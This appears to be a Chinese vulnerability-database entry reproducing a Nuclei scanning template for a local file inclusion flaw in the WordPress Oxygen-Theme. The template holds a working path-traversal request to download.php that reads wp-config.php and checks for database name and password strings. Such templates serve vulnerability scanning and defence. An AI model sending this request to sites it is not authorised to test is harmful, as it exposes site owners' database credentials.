wp-oxygen-theme-lfi: WordPress Oxygen-Theme - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Oxygen-Theme | POC: 已公开

漏洞描述

WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.

PoC代码[已公开]

id: wp-oxygen-theme-lfi

info:
  name: WordPress Oxygen-Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030178
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-theme,lfi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a441464b9d21300b37fbad9413c03b50cdd525884bc76b4990925fa4faa0e8d2022100a1d04e6c4a60f745eab5296d8dadf7708522b4cd0504f5612e78b3a1be103e64:922c64590222798bb761d5b6d8e72950

相关漏洞推荐